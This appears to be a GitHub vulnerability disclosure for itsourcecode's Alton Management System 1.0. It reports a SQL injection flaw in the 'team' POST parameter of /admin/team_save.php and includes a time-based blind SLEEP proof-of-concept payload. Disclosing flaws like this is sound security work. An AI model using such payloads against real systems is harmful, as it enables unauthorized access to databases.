Skip to content

Latest commit

 

History

History
29 lines (17 loc) · 730 Bytes

CVE8-6.md

File metadata and controls

29 lines (17 loc) · 730 Bytes
Raw

Vendor

itsourcecode

Product

Alton Management System

version

1.0

Download Source Code: https://itsourcecode.com/wp-content/uploads/2020/02/altonsystem.zip

Description

After logging in as a backend user, request the "/admin/team_save.php" page and pass in the "team" parameter. Due to the lax filtering of the "team" parameter on this page, SQL injection vulnerabilities were created. image

Poc

Parameter: team (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: team=1' AND (SELECT 3890 FROM (SELECT(SLEEP(5)))fjEz) AND 'ibZM'='ibZM